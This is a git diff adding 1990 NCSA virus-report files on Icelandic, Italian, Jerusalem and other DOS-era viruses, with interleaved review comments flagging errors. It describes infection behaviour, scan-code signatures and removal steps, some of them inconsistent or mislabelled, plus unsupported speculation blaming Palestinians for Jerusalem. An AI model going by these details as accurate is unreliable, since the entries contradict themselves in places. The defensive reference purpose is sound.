@@ -0,0 +1,38 @@ + Ŀ + VIRUS REPORT + Golden Gate-D + + +Host Machine: PC compatibles. + +Derived from: Golden Gate-C. + + This virus is identical to Golden Gate-C, except the counter has been +disabled (similar to original Alameda). + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa069.txt b/textfiles.com/virus/NCSA/ncsa069.txt new file mode 100644 index 00000000..e163f407 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa069.txt 
@@ -0,0 +1,54 @@ + Ŀ + VIRUS REPORT + Halloechen Virus + + +Place of Origin: West Germany + +Host Machine: PC compatibles. + +Host Files: COM and EXE files. Memory resident. + +OnScreen Symptoms: keyboard input will appear garbled. + +Increase in Size of Infected Files: 2,011 bytes. + +Detected by: Scanv57+. + +Removed by: delete infected files or run Scan/D. + + First reported by Christoff Fischer of the University of Karlsruhe, +West Germany. It is now widespread in West Germany. + + When an infected program is run, Halloechen installs in memory. From +memory, it infects any EXE or COM which is run, providing the program is +less than about 62K in size, and has a file date outside the current +system date's month. During the infection, the file's size is increased +to a multiple of 16, then the 2,011 bytes of virus code are added to it. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
diff --git a/textfiles.com/virus/NCSA/ncsa070.txt b/textfiles.com/virus/NCSA/ncsa070.txt new file mode 100644 index 00000000..115ba951 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa070.txt 
@@ -0,0 +1,57 @@ + Ŀ + VIRUS REPORT + Holland Girl + + +Synonyms: 1332 virus, Sylvia. + +Place of Origin: the Netherlands. + +Host Machine: PC compatibles. + +Host Files: COM files. Remains resident. + +Increase in Size of Infected Files: 1332 bytes. + +Nature of Damage: Corrupts program or overlay files. + +Detected by: Scanv50+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, F-Prot, or Scan/D. + + This virus was first reported by Jan Terpstra in the Netherlands. It +infects COM files (but not COMMAND.COM), increasing their size by 1332 +bytes. + + It contains the name, address, and phone number of a Dutch woman +named Sylvia, and requests that post cards be sent to her. It may have +been written by an ex-boyfriend. + + Potential damage from this virus is not yet known. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
diff --git a/textfiles.com/virus/NCSA/ncsa071.txt b/textfiles.com/virus/NCSA/ncsa071.txt new file mode 100644 index 00000000..52059926 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa071.txt 
@@ -0,0 +1,82 @@ + Ŀ + VIRUS REPORT + Icelandic 1 + + +Synonyms: Saratoga 1, Icelandic, One in Ten, Disk Crunching Virus. + +Date of Origin: June, 1989. + +Place of Origin: Iceland. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects EXE files. + +Increase in Size of Infected Files: 642 bytes. A variant adds 656 bytes. +Another grows by 671 bytes. File lengths after infection are divisible +by 16. + +Nature of Damage: Affects system run-time operation. Corrupts program +files. + +Detected by: Scanv56+, F-Prot, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot. + +Scan Code: Infected files always end with 44 18 5F 19. You can also +search at offset 0C6H for 2E C6 06 87 02 0A 90 50 53 51. + + The Icelandic virus was first detected in June, 1989, disassembled a +week later, and the disassembly was made available around the beginning +of July. The basic Icelandic virus is a resident EXE-file infector that +infects every second EXE file executed, and sometimes will mark a free +cluster on a hard disk as bad (the "damage" routine). + + The Icelandic virus will copy itself to the top of free memory the +first time an infected program is executed. Once in high memory, it hides +from memory mapping programs. If a program later tries to write to this +area of memory, the computer will crash. If the virus finds that some +other program has "hooked" Interrupt 13, it will not proceed to infect +programs. If Interrupt 13 has not been "hooked", it will attempt to +infect every 10th program executed. + + The virus attaches itself to the end of the programs it infects, and +infected files will always end with "4418,5F19"H. + + On systems with 12-bit FATs (floppy drives or 10 MB hard disks), the +virus will not cause any damage. However, on systems with 16-bit FATs +(hard disks larger than 10 MB), the virus will select one unused FAT +entry and mark the entry as a bad sector each time it infects a program. 
+ + It is likely that as of this writing, the virus has not been detected +outside of Iceland. Several variants are known, including Saratoga 2, +Icelandic Virus Version 2, and MIX1. See also the table.<$&3 Icelandic> + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa072.txt b/textfiles.com/virus/NCSA/ncsa072.txt new file mode 100644 index 00000000..e538ec91 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa072.txt 
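Review bot: the infection rate is stated two ways in the same entry: "infects every second EXE file executed" in the overview and "attempt to infect every 10th program executed" two paragraphs later (the synonym "One in Ten" supports the latter); one of the two needs correcting. The string "<$&3 Icelandic>" after "See also the table." is an index marker left over from the book's typesetting and should be removed or replaced with the table reference it stood for.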
@@ -0,0 +1,73 @@ + Ŀ + VIRUS REPORT + Icelandic Virus Version 2 + + +Synonyms: System Virus, One in Ten virus + +Date of Origin: July, 1989. + +Place of Origin: Iceland. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects EXE files. + +Increase in Size of Infected Files: 632 or 661 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot. + +Derived from: Icelandic virus. + +Scan Code: You can search at offset 0B8H for 2E C6 06 79 02 02 90 50 53 +51. + + This version of the Icelandic virus differs from the Icelandic in +that it bypasses INT21 and doesn't have the code to mark a cluster bad. +It doesn't have the INT13 check that the second version does. + + Each time the Icelandic-II virus infects a program, it will modify +the file's date, thus making it fairly obvious that the program has been +changed. The virus will also remove the read-only attribute from files, +but does not restore it after infecting the program. + + The Icelandic-II virus can infect programs even if the system is +running an anti-viral TSR that monitors interrupt 21, such as FluShot+. + + On hard disks larger than 10 MB, there are no bad sectors marked in +the FAT as there is with the Icelandic virus. + + Although this version has been called version 2, it may actually have +been the first released draft, and the Icelandic 1 may be the second. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. 
Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa073.txt b/textfiles.com/virus/NCSA/ncsa073.txt new file mode 100644 index 00000000..35b835ae --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa073.txt 
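Review bot: "It doesn't have the INT13 check that the second version does" is self-referential in an entry titled Version 2 and sits oddly beside "Derived from: Icelandic virus"; the sentence presumably means the Icelandic 1 entry, which describes the Interrupt 13 check, so name that version explicitly. "bypasses INT21" is also stated without saying what it means; the later sentence about infecting despite an interrupt 21 monitor such as FluShot+ is the consequence, and the two should be tied together.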
@@ -0,0 +1,69 @@ + Ŀ + VIRUS REPORT + Icelandic Virus Version 3 + + +Synonyms: December 24th virus + +Date of Origin: December, 1989. + +Place of Origin: Iceland. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects EXE files. + +OnScreen Symptoms: The message "Gledelig jol" may appear on December 24. + +Increase in Size of Infected Files: 843, 853, or 863 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program +files. + +Detected by: Scanv57+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot, or delete infected files. + +Derived from: Icelandic virus. + +Scan Code: May be identified by the last four bytes of an infected +program, "1844,195F"H -- a reversal of the ID of Icelandic I and II. You +can also search at offset 106H for 2E C6 06 6F 02 0A 90 50 53 51. + + The Icelandic-III virus is very similar to the Icelandic Virus, from +which it was adapted. There are minor changes including the addition of +several NOP instructions. + + This virus will not infect any program previously infected by +Icelandic or Icelandic-II. + + If an infected program is run on December 24th of any year, programs +subsequently run will be stopped, later displaying the message "Gledileg +jol" ("Merry Christmas" in Icelandic) instead. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. 
Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa074.txt b/textfiles.com/virus/NCSA/ncsa074.txt new file mode 100644 index 00000000..ebde33a3 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa074.txt 
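Review bot: the Christmas message is spelled "Gledelig jol" under OnScreen Symptoms and "Gledileg jol" in the body; the body's spelling is the correct Icelandic (Gleðileg jól) and the header should match it.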
@@ -0,0 +1,41 @@ + Ŀ + VIRUS REPORT + IRQ Ver 41.0 Virus + + +Host Machine: PC compatibles. + + The IRQ virus attacks the file C:dir as well as the first executable +file that it finds listed in your startup-sequence files. It is to your +advantage to check all your disks startup files and the first executable +file referenced once infected with the IRQ virus. + +KV (KillVirus) will detect the IRQ Ver 41.0 virus in an executable file +and remove the virus from the file. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa075.txt b/textfiles.com/virus/NCSA/ncsa075.txt new file mode 100644 index 00000000..ed38df52 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa075.txt 
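Review bot: "Host Machine: PC compatibles" looks wrong for this entry: "C:dir", "startup-sequence" and KV (KillVirus) are AmigaDOS terms, so the IRQ virus described here is an Amiga file infector, not a PC one. The entry also lacks the Host Files, Nature of Damage and Detected by fields that the other reports carry, and "check all your disks startup files" should read "all your disks' startup files".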
@@ -0,0 +1,87 @@ + Ŀ + VIRUS REPORT + Italian Virus + + +Synonyms: Bouncing Ball, Vera Cruz, Ping-Pong, Bouncing Dot, Missouri +virus. + +Date of Origin: March, 1988. + +Host Machine: PC compatibles. Original version won't infect 80286 or +80386 computers or hard disks. + +Host Files: Remains resident. Infects boot sector on any disk with at +least two sectors per cluster. + +OnScreen Symptoms: A bouncing ball or dot may appear on the screen upon +activation. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts or +overwrites boot sector. Does no apparent damage. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: CleanUp, MDisk, F-Prot, or DOS SYS command. + +Scan Code: 8E D8 A1 13 04 2D 02 00 A3 13 04 B1 06 D3 E0 2D C0 07 8E C0 BE +00 7C 8B FE B9 00. You can also search at offset 07CH for C7 06 4C 00 D0 +7C 8C 0E 4E 00. + +Description of Operation: This is a boot sector virus. Some forms infect +only floppies, others will also infect the boot sector of hard disks. +This virus consists of a boot sector and 1 cluster (2 sectors used) +marked as bad in the first copy of the FAT. The first of these sectors +contains the rest of the virus, and the second contains the original boot +sector. It infects all disks which have at least two sectors per +cluster, and it occupies 2K of memory. + + When this virus activates (randomly) a bouncing dot/bouncing diamond +(ASCII 4) /bouncing smiley face (ASCII 2) appears on the +screen and can only be removed through reboot. The virus can be triggered +by a disk access, should one occur during a one second window that occurs +about every half hour. When triggered, the dot bounces off the edges of +the screen, and passes through any text, with replacement after it. +Sometime, this doesn't work properly, the bouncing character interacts +with the characters on the screen, and screen displays are messed up. 
+Infected diskettes have 1K in bad sectors, infected hard disks have 2K +(and other numbers of bad sectors are possible). No known intentional +damage. Unintentional damage - the two copies of the FAT are left +different; DOS might not like this. Attempts to infect diskettes slows +them down, and some computers won't read floppies, due to time-outs. No +other damage is done. + +Recovery: Recover by powering down the system, and then using a +write-protected DOS disk to boot. Use the SYS command from the floppy to +attempt to re-create a good boot sector. Alternatively, use the program +MD. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa076.txt b/textfiles.com/virus/NCSA/ncsa076.txt new file mode 100644 index 00000000..1d79af0b --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa076.txt 
@@ -0,0 +1,71 @@ + Ŀ + VIRUS REPORT + Italian-B + + +Synonyms: Bouncing Ball, Vera Cruz, Ping-Pong-B, Bouncing Dot. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects floppy and hard disk boot sectors. +(The original infected only floppy disks). + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, MDisk, F-Prot, or DOS SYS command. + +Derived from: Italian. + + This is a variation of Italian that is able to infect hard disks. + + Some of the characteristics are: + +* Fairly long time before activation (a number of minutes at least) + +* It displays a ball character, not the Diamond Character + +* Once activated, the ball bounces around the screen until the system + is shut off. + +* Formatted system & non-system disks are infected and have the one bad + spot created by the virus. + +* When a user attempts to format the hard disk, format scans the disk OK + and then reports that track 0 is bad. + +* Formatted system floppy disks tend to lock up the PC on boot, and warm + reboot doesn't work. + +* The main problem is re-infection and spreading to other machines. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. 
Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa077.txt b/textfiles.com/virus/NCSA/ncsa077.txt new file mode 100644 index 00000000..343d17a3 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa077.txt 
@@ -0,0 +1,58 @@ + Ŀ + VIRUS REPORT + ItaVir + + +Synonyms: 3880 virus + +Date of Origin: March, 1990. + +Place of Origin: Milan, Italy. + +Host Machine: PC compatibles. + +Host Files: EXE files. Non-resident. + +Increase in Size of Infected Files: 3,880 bytes + +Detected by: Scan v.60+. + +Removed by: Scan/D, or delete whatever is infected. + + Recognition of this virus is straightforward. EXE files will grow in +length by 3,880 bytes, and a file named ?OMMAND.COM (where ? is a non- +printing character) will be found on the disk. This file contains the +virus, and is used as a source of the code during infection. + + Itavir won't activate until it has been in the system for 24 hours or +more. Upon activation, it corrupts the boot sector, so that the system +will not boot after power down. A message (in Italian) is displayed, and +ASCII codes 0-255 are sent to all ports. Some monitors will flicker or +(if VGA) will hiss when this occurs. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. 
+ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa078.txt b/textfiles.com/virus/NCSA/ncsa078.txt new file mode 100644 index 00000000..a29fa37d --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa078.txt 
@@ -0,0 +1,170 @@ + Ŀ + VIRUS REPORT + Jerusalem Virus + + +Synonyms: Israeli, Friday the 13th, Black Hole, Black Box, PLO, 1808 +(EXE), 1813 (COM), sUMsDos, Russian. + +Date of Origin: December 24, 1987 (date first detected in Israel). + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE, overlay files. + +Increase in Size of Infected Files: 1808 bytes for EXE files (usually), +1813 bytes for COM files. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, UNVIRUS, IMMUNE, M-J, Scan/D/A, Saturday, F-Prot. + +Derived from: Suriv03 + +Scan Code: 8E D0 BC 00 07 50 B8 C5 00 50 CB FC 06 2E 8C 06 31 00 2E 8C 06 +39 00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0. You can also search at offset +095H for FC B4 E0 CD 21 80 FC E0 73 16. + + History: The Jerusalem virus was first discovered at the Hebrew +University in Jerusalem on December 24, 1987, and reported to the virus +research community by Y. Radai of the Hebrew University of Jerusalem. My +personal suspicion is that the virus was written by a Palestinian, or +other enemy of Israel, and planted within Israel. Israel was declared an +independent state on May 14, 1948. Friday, May 13, 1988 would have been +40 years in which Palestine was no longer sovereign. Although it was +detected in late 1987, it contained code to prevent it from going off +until May 13, 1988. Other viruses set to go off on Friday the 13th are +likely copy-cats, whose authors simply thought that Friday the 13th was +unlucky, wanted a trigger date, and thought this would do fine. + +Operation: This virus is a memory resident infector. Any "clean +program" run after an infected program is run will become infected. Both +COM and EXE files are infected. The virus occurs attached to the +beginning of a COM file, or the end of an EXE file. 
A COM file also has +the five-byte marker attached to the end. This marker is usually (but +not always) "MsDos", and is preceeded in the virus by "sU". "sUMsDos" is +not usually found in newer varieties of this virus. COM files increase +in length by 1813 bytes. EXE files usually increase by 1808 bytes, but +the displacement at which to write the virus is taken from the length in +the EXE header and not the actual length. This means that part or all of +this 1808 bytes may be overwritten on the end of the host program. + + It becomes memory-resident when the first infected program is run, +and it will then infect every program run except COMMAND.COM. COM files +are infected once only, EXE files are re-infected each time they are run. + + + Interrupt 8 is redirected. After the system has been infected for +thirty minutes (by running an infected program), an area of the screen +from row 5 column 5 to row 16 column 16 is scrolled up two lines creating +a black two line "window". From this point a time-wasting loop is +executed with each timer interrupt, slowing the system down by a factor +of 10. + + If the system was infected with a system date of Friday the +thirteenth, every program run will be deleted instead. This will +continue irrespective of the system date until the machine is rebooted. +The end of the virus, from offset 0600H, is rubbish and will vary from +sample to sample. + + Jerusalem contains a flaw which makes it re-infect EXE (but not COM) +files over and over (up to five times or until the file becomes too big +to fit into memory, whichever comes first.) + + The names 1808 and 1813 come from the fact that files grow by 1808 or +1813 bytes, without changing their date and time or read/write/hidden +attributes. COMMAND.COM does not grow, to help it avoid detection. In +fact, it seems likely that the disk version of COMMAND.COM is not +modified, but that the in-memory copy of COMMAND.COM is modified when an +infected program is run. 
+ + The virus causes some intentional damage: + +* there is code in the virus for deleting each program that you run on + every Friday 13th. On January 13 (Friday), 1989, this virus made a + shambles of hundreds of PC-compatibles in Britain + +* The virus re-directs interrupt 8 (among others) and one-half hour + after an infected program loads, the new timer interrupt introduces a + delay which slows down the processor by a factor of 10. (see figure). + + It is difficult to estimate the total dollar value of damage done by +this virus to date. In just one case, reported in the Israeli newspaper +Maariv, it destroyed $15,000 worth of software and two disks in which +7,000 hours of work had been invested. + + Disinfection can be a complex process. UNVIRUS will easily +eradicate this virus and 5-6 others as well. IMMUNE will prevent further +infection. + + Alternatively, shareware programs written by Dave Chamber and +distributed through bulletin boards under the name M-J may be used. M-J +removes the virus from hard disks; M-JFA removes the virus from floppy +disks that are inserted into the system's A drive; M-JFB removes the +virus from floppy disks that are inserted into the system's B +drive. + + Alternatively, here is the process for removal: + +* power down the system. + +* Boot from a write-protected, clean system master diskette. + +* Delete all of the infected programs as indicated by VIRUSCAN. + +* Replace the programs from original write-protected program + distribution diskettes. + +* Do not execute any program from the infected hard disk until the + disinfection process is complete. + +* After cleaning all hard drives in the infected system, all floppies + that have come into contact with the system should be SCANned and + disinfected in the same manner. + + Another means of detection: using PCtools or another text search +utility, search for the ASCII string "sUMsDos". This string is present +in all copies of this particular virus strain. 
+ + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa079.txt b/textfiles.com/virus/NCSA/ncsa079.txt new file mode 100644 index 00000000..729edb0b --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa079.txt 
@@ -0,0 +1,59 @@ + Ŀ + VIRUS REPORT + Jerusalem-B + + +Synonyms: Arab Star, Black Box, Black Window, Hebrew University + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects SYS, COM, EXE, overlay files. + +Increase in Size of Infected Files: 1808 bytes (EXE files), 1813 bytes +(COM files). Sometimes does not re-infect EXE files. + +Nature of Damage: Affects system run-time operation. Corrupts program +files. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: CleanUp, F-Prot, Saturday, M-Jruslm, UnVirus. + +Derived from: Jerusalem virus. + + This virus is identical to the Jerusalem except: + +* it is sometimes able to successfully identify pre-existing + infections in EXE files and may only infect them once. + +* It may not slow the system after infection. + + It is easily the most common of all PC viruses. It can infect SYS, +COM, EXE, and overlay files. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
diff --git a/textfiles.com/virus/NCSA/ncsa080.txt b/textfiles.com/virus/NCSA/ncsa080.txt new file mode 100644 index 00000000..d611cdcd --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa080.txt 
@@ -0,0 +1,66 @@ + Ŀ + VIRUS REPORT + Jerusalem-C + + +Synonyms: the New Jerusalem. + +Date of Origin: October 14, 1989. + +Place of Origin: first reported in the Netherlands by Fidonet SYSOPS Jan +Terpstra and Ernst Raedecker. May have originated elsewhere in Europe. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE, SYS, BIN, PIF, overlay +files. + +Increase in Size of Infected Files: 1808 bytes (EXE), 1813 bytes (COM). + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv45+, F-Prot. + +Removed by: CleanUp, Saturday, F-Prot. + +Derived from: Jerusalem-B. + + This virus seems to be a special version designed to elude virus +detectors, including McAfee's Scan versions prior to 45 and IBM's +VIRSCAN of October 20, 1989 and earlier. + + This virus is identical to Jerusalem-B except that the timer +interrupt delay code has been bypassed. That is, it will not slow your +computer when it has activated. This virus is virtually invisible until +it activates. It infects both .EXE and .COM files and activates on any +Friday the 13th, deleting infected programs when you attempt to run +them. This virus is memory resident, and as with the other Jerusalem +viruses, may infect overlay, .SYS, .BIN, and .PIF files. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. 
Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa081.txt b/textfiles.com/virus/NCSA/ncsa081.txt new file mode 100644 index 00000000..216c7bc2 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa081.txt @@ -0,0 +1,39 @@ + Ŀ + VIRUS REPORT + Jerusalem-D + + +Host Machine: PC compatibles. + +Derived from: Jerusalem-C. + + This is the Jerusalem-C that destroys both versions of the FAT on any +Friday the 13th after 1990. The code that originally deleted executed +programs has been overwritten with the FAT destructive code. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 